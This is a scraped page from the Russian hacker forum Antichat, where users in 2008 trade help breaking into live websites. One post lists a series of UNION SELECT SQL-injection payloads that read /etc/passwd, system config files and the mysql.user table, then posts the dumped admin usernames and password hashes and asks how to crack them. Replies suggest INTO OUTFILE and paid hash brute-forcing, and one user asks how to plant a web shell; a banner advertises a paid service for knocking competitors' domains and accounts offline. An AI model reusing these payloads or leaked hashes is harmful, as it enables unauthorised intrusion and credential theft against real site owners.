Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 248 из 1393

248

Опции темы

Поиск в этой теме

Опции просмотра

#2471

25.06.2008, 21:24

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

Провел на форуме:
137918

Репутация: 56

Отправить сообщение для z3r0cool с помощью ICQ

Цитата:

Сообщение от Ershik

К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'

http://ru2.php.net/manual/en/function.array-count-values.php

#2472

25.06.2008, 21:48

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

z3r0cool ошибка появляется не только в этом параметре....
на пример введи в поле поиска кавычку

#2473

25.06.2008, 22:27

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Gorev
Поиск это и есть параметр sstring
Запрос у тебя вываливается на страницу посмотри внимательно ,и всё сам увидишь
Попробуй ввести 10 символов(любых) и ковычку ошибки не будет, а 9 символов и ковычка- ошибка То-есть обрезается запрос после 10 символов + 2 знака %
LIKE '%твои_10_символов%'

#2474

25.06.2008, 22:38

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

jokester spasibo... znachit ne sud'ba

#2475

26.06.2008, 13:15

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Отправить сообщение для mff с помощью ICQ

Люди!!! Что делать?
Вот получил 80 kb хлама по запросам:
?news_id=9999+union+select+1,2,3,4,5,6,7/*
?news_id=9999+union+select+1,2,3,DATABASE(),5,6,7/*
?news_id=9999+union+select+1,2,3,USER(),5,6,7/*
?news_id=9999+union+select+1,2,3,VERSION(),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7/*
?news_id=9999+union+select+1,2,3,concat_ws(0x2F,us er,password),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/syslog.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/ftpusers'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/proftpd.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/hosts'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/services'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/group'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/profile'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/bashrc'),5,6,7/*

Самое ценное это

horde/7ec6cb6253573035
pma_0m8q29w9ure8/042d59146e94d7b2
admin/54e0c6945fa5e34c
u15364/6cb1963d2018c3ea

А что теперь делать то? Hash расшифровать неполучается.
Нужен дамп базы данных! HELP ME

#2476

26.06.2008, 13:25

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

Хеши Mysql попробуй попросить сбрутить из за платно.

#2477

26.06.2008, 13:30

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Уже раз 10 просил - пока ничего

http://hashcracking.info - нет результата

PasswordRpo - кислота

HELP ME

Последний раз редактировалось mff; 26.06.2008 в 13:33..

#2478

26.06.2008, 13:37

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

Провел на форуме:
137918

Репутация: 56

Цитата:

Сообщение от mff

Люди!!! Что делать?

INTO OUTFILE вроде никто не отменял?

Кидай если что линк в личку, посмотрим.

#2479

26.06.2008, 23:33

sedoy_xxx

Участник форума

Регистрация: 05.07.2006

Сообщений: 285

Провел на форуме:
3295822

Репутация: 117

могу менять html код страницы, знаю полный путь до папки, как залить шелл? а именно стянуть с удаленного сервака файл в эту папку?
Конструкции типа <? php system("ls") ?> не выполняются. js работает

Последний раз редактировалось sedoy_xxx; 26.06.2008 в 23:58..

#2480

26.06.2008, 23:53

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

sedoy_xxx, php, я так понял, там не выполняеца?

Страница 248 из 1393

248

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход